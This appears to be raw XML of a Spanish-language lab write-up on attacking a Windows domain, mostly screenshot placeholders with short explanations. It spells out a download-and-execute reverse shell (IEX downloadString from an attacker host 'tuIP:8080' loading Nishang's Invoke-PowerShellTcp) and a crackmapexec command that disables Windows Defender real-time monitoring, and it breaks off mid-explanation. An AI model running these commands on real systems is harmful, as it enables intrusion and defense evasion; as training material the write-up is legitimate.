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75832" w14:textId="7D9D8833" w:rsidR="00FC4EA2" w:rsidRDefault="00FC4EA2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ya tenemos una maquina unida al dominio asi que despues de descativar el windows defender para descomprimir las tools que tenemos en la ruta especificada </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F330FB" w14:textId="1F7F180C" w:rsidR="00DB7D65" w:rsidRDefault="00294170">
      <w:r w:rsidRPr="00294170">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18F1E80D" wp14:editId="5DE16A64">
            <wp:extent cx="5760720" cy="24187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403A" w14:textId="0BE90DE6" w:rsidR="00FC4EA2" w:rsidRDefault="00FC4EA2">
      <w:r>
        <w:t>El comando -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bypass sirve para ejecutar </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>scripts ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> después procedemos a importar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="515CAB50" w14:textId="06C6EB9A" w:rsidR="00294170" w:rsidRDefault="00BB3105">
      <w:r w:rsidRPr="00BB3105">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="224F2954" wp14:editId="600DABAF">
            <wp:extent cx="5760720" cy="3225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B85" w14:textId="6245961C" w:rsidR="00FC4EA2" w:rsidRDefault="00FC4EA2">
      <w:r>
        <w:t xml:space="preserve">Probamos varios comandos de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>de</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para enumeración </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7377A4" w14:textId="7EECFC52" w:rsidR="00BB3105" w:rsidRDefault="00BB3105">
      <w:r w:rsidRPr="00BB3105">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BF8CCBA" wp14:editId="52D2E020">
            <wp:extent cx="5239481" cy="176237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C7AE" w14:textId="39949DB2" w:rsidR="00BB3105" w:rsidRDefault="00BB3105">
      <w:r w:rsidRPr="00BB3105">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A7E8975" wp14:editId="30DA1642">
            <wp:extent cx="5760720" cy="2405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8697" w14:textId="229C9B8C" w:rsidR="00BB3105" w:rsidRDefault="00BB3105">
      <w:r w:rsidRPr="00BB3105">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="657CB00D" wp14:editId="08287D5E">
            <wp:extent cx="5760720" cy="29140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87F" w14:textId="5AF1F1DC" w:rsidR="00FC4EA2" w:rsidRDefault="00FC4EA2">
      <w:r>
        <w:t xml:space="preserve">Este comando nos sirve para enumerar </w:t>
      </w:r>
      <w:r w:rsidR="00B15A37">
        <w:t xml:space="preserve">las descripciones de los usuarios </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152FB168" w14:textId="3765D240" w:rsidR="00C00680" w:rsidRDefault="00C2208F">
      <w:r w:rsidRPr="00C2208F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="036CF490" wp14:editId="05EEDB75">
            <wp:extent cx="5430008" cy="4191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A44F" w14:textId="0ED86F79" w:rsidR="00C2208F" w:rsidRDefault="00C2208F">
      <w:r w:rsidRPr="00C2208F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="018C8663" wp14:editId="070C2A68">
            <wp:extent cx="3791479" cy="52394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33AD" w14:textId="6F923DA7" w:rsidR="00B15A37" w:rsidRDefault="00B15A37">
      <w:r>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504360A5" w14:textId="283684E4" w:rsidR="00CD1D8D" w:rsidRDefault="00CD1D8D">
      <w:r w:rsidRPr="00CD1D8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725FA0D4" wp14:editId="357A19A4">
            <wp:extent cx="5760720" cy="30797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F046" w14:textId="6A6EC012" w:rsidR="00CD1D8D" w:rsidRDefault="00CD1D8D">
      <w:r w:rsidRPr="00CD1D8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AC9A6F1" wp14:editId="7F869E2A">
            <wp:extent cx="5760720" cy="1709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5479" w14:textId="5BA0D754" w:rsidR="00CD1D8D" w:rsidRDefault="00CD1D8D">
      <w:r w:rsidRPr="00CD1D8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C61FC5D" wp14:editId="6D70E86F">
            <wp:extent cx="5760720" cy="29762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8AAE" w14:textId="3CD484B2" w:rsidR="00D1395A" w:rsidRDefault="00D1395A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DE6EA7D" wp14:editId="33AADC5C">
            <wp:extent cx="6242068" cy="1717394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07" cy="172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3813F" w14:textId="10A6CCD7" w:rsidR="00D1395A" w:rsidRDefault="00D1395A">
      <w:r w:rsidRPr="00D1395A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C569500" wp14:editId="320BFAF1">
            <wp:extent cx="5760720" cy="4718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D0C" w14:textId="708D2A89" w:rsidR="00D1395A" w:rsidRDefault="00D1395A">
      <w:r w:rsidRPr="00D1395A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E670DB" wp14:editId="1E1396CE">
            <wp:extent cx="5760720" cy="631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B178" w14:textId="242AC963" w:rsidR="00D1395A" w:rsidRDefault="00D1395A">
      <w:r w:rsidRPr="00D1395A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21EE5C7E" wp14:editId="051B0788">
            <wp:extent cx="5760720" cy="23368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14A" w14:textId="62DBE14C" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0">
      <w:r w:rsidRPr="00CB5CB0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D31413" wp14:editId="6B7DC0F1">
            <wp:extent cx="5760720" cy="4260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Sabemos que podemos ejecutar comandos con el usuario Administrador debido a que ya obtuvimos el </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hash ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> buscamos la manera de ejecutar una reverse Shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F1892" w14:textId="633E6B75" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0"/>
    <w:p w14:paraId="6CAD6036" w14:textId="073E62CA" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0">
      <w:r w:rsidRPr="00CB5CB0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EC7A67E" wp14:editId="70264553">
            <wp:extent cx="5760720" cy="25482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691" w14:textId="4088AB16" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0">
      <w:r>
        <w:t xml:space="preserve">Encontramos en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> una manera de ejecutar dicha reverse </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Shell ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> debemos instalar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nishang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56183E76" w14:textId="027A034A" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0">
      <w:r w:rsidRPr="00A258D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="403DB068" wp14:editId="6CE403FD">
            <wp:extent cx="5760720" cy="20307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E375" w14:textId="5503789E" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0">
      <w:r>
        <w:t xml:space="preserve">Lo encontramos en un repositorio de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y lo descargamos en nuestra maquina Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5200F" w14:textId="77777777" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0"/>
    <w:p w14:paraId="05A2EEA6" w14:textId="01371C52" w:rsidR="00A258D9" w:rsidRDefault="00A258D9">
      <w:r w:rsidRPr="00A258D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37C6E8B2" wp14:editId="230BBB17">
            <wp:extent cx="5760720" cy="11639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1DE0" w14:textId="11D838B8" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0">
      <w:r>
        <w:t xml:space="preserve">Debemos agregarle en la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ultima</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> línea del </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">archivo,  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB5CB0">
        <w:t>Invoke</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB5CB0">
        <w:t>-PowerShellTcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5CB0">
        <w:t xml:space="preserve">ste es el nombre del comando que ejecuta una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB5CB0">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB5CB0">
        <w:t xml:space="preserve"> de PowerShell a través de TCP. Es parte de la herramienta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB5CB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nishang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB5CB0">
        <w:t>, que contiene varios scripts para ataques de PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C6EA4B" w14:textId="5404CBF4" w:rsidR="00A258D9" w:rsidRDefault="00A258D9">
      <w:r w:rsidRPr="00A258D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D1AED7B" wp14:editId="008F8549">
            <wp:extent cx="5760720" cy="6559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73B" w14:textId="042BA67C" w:rsidR="00CB5CB0" w:rsidRDefault="00CB5CB0">
      <w:r>
        <w:t xml:space="preserve">Subimos un servidor http para que la maquina atacante pueda descargar </w:t>
      </w:r>
      <w:r w:rsidR="007663FA">
        <w:t xml:space="preserve">el archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007663FA">
        <w:t>Invoke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007663FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AB38E" w14:textId="7D613E0C" w:rsidR="00A258D9" w:rsidRDefault="00CB5CB0">
      <w:r w:rsidRPr="00CB5CB0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6334C5B9" wp14:editId="7A922790">
            <wp:extent cx="4915586" cy="5525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C9C" w14:textId="1C9FF607" w:rsidR="007663FA" w:rsidRDefault="007663FA"/>
    <w:p w14:paraId="3FAE3DB7" w14:textId="1A8260C9" w:rsidR="007663FA" w:rsidRDefault="007663FA"/>
    <w:p w14:paraId="16C7C78E" w14:textId="093F3F79" w:rsidR="007663FA" w:rsidRDefault="007663FA"/>
    <w:p w14:paraId="5A72B0DD" w14:textId="49EBA019" w:rsidR="007663FA" w:rsidRDefault="007663FA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Como observamos </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>anteriormente ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> podemos ejecutar comando , por lo tanto descargamos y ejecutamos el archivo que subimos previamente </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C50711" w14:textId="6F69B805" w:rsidR="007663FA" w:rsidRDefault="007663FA">
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63D7143D" wp14:editId="449759EA">
            <wp:extent cx="5760720" cy="1950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746" w14:textId="48C4F8F2" w:rsidR="007663FA" w:rsidRPr="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t>: Llama al intérprete de PowerShell, que permite ejecutar scripts y comandos dentro de PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F41828" w14:textId="478F415E" w:rsidR="007663FA" w:rsidRPr="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IEX</w:t>
      </w:r>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve">: Esta es una abreviatura de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve">. El </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:t>cmdlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve"> ejecuta un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve"> de texto como si fuera un comando de PowerShell. En este caso, el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve"> es el que se obtiene descargando el contenido de la URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F7432" w14:textId="77777777" w:rsidR="007663FA" w:rsidRPr="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007663FA">
        <w:t>IEX permite ejecutar código dinámicamente. Si el contenido descargado es un script PowerShell, será ejecutado directamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36298ED0" w14:textId="5DCB8ABD" w:rsidR="007663FA" w:rsidRPr="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve">: Crea una nueva instancia de la clase </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t>, que es una clase de .NET utilizada para realizar operaciones de descarga o carga de datos a través de HTTP o FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73588392" w14:textId="64965B76" w:rsidR="007663FA" w:rsidRPr="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>downloadString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>('http://tuIP:8080/Invoke-PowerShellTcp.ps1')</w:t>
      </w:r>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve">: Usa el método </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>downloadString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve"> del objeto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve"> para descargar el contenido de la URL proporcionada. En este caso, la URL es http://tuIP:8080/Invoke-PowerShellTcp.ps1, lo que sugiere que el script Invoke-PowerShellTcp.ps1 está hospedado en un servidor web en la máquina atacante, en la dirección IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:t>tuIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve"> y en el puerto 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC7938" w14:textId="2125B088" w:rsidR="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve">La función </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>downloadString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007663FA">
        <w:t xml:space="preserve"> recupera el contenido del archivo Invoke-PowerShellTcp.ps1 desde el servidor web y lo devuelve como una cadena de texto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF21E22" w14:textId="0C7AD832" w:rsidR="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC4A179" w14:textId="4F226EDA" w:rsidR="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007663FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="079628AD" wp14:editId="2FE71521">
            <wp:extent cx="5760720" cy="22606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6F31" w14:textId="18341B67" w:rsidR="007663FA" w:rsidRDefault="007663FA" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Después de lanzar el comando observamos que se conecta por la el puerto que pusimos y ya tenemos una Shell a administrador </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53241513" w14:textId="20ECFA00" w:rsidR="00ED7766" w:rsidRDefault="00ED7766" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7766">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B87F9B6" wp14:editId="30E503AF">
            <wp:extent cx="5760720" cy="22580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B278" w14:textId="44B4DBFD" w:rsidR="009D4F05" w:rsidRDefault="00E53F89" w:rsidP="009D4F05">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Otra manera es tener acceso a una estación es por medio de una </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nc.exe ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> primero identificamos la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de la estación que queremos atacar , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teneindo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en cuenta que ya tenemos credenciales del Administrador , podemos usar la herramienta de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para ejecutar comandos y desactivamos el Windows Defender</w:t>
      </w:r>
      <w:r w:rsidR="009D4F05">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009D4F05">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009D4F05">
        <w:br/>
        <w:t>-x "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D4F05">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D4F05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D4F05">
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D4F05">
        <w:t xml:space="preserve"> \"Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D4F05">
        <w:t>MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D4F05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D4F05">
        <w:t>DisableRealtimeMonitoring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D4F05">
        <w:t xml:space="preserve"> \$true\""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A580836" w14:textId="77777777" w:rsidR="009D4F05" w:rsidRDefault="009D4F05" w:rsidP="009D4F05">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Especifica que el comando a ejecutar se realizará en PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3FC6CD" w14:textId="77777777" w:rsidR="009D4F05" w:rsidRDefault="009D4F05" w:rsidP="009D4F05">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Permite pasar un comando a PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BFE7E" w14:textId="77777777" w:rsidR="009D4F05" w:rsidRDefault="009D4F05" w:rsidP="009D4F05">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DisableRealtimeMonitoring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9EE391" w14:textId="77777777" w:rsidR="009D4F05" w:rsidRDefault="009D4F05" w:rsidP="009D4F05">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: Es un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmdlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de PowerShell usado para configurar las preferencias de Windows Defender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F98CF" w14:textId="338D0991" w:rsidR="00E53F89" w:rsidRDefault="009D4F05" w:rsidP="009D4F05">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DisableRealtimeMonitoring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
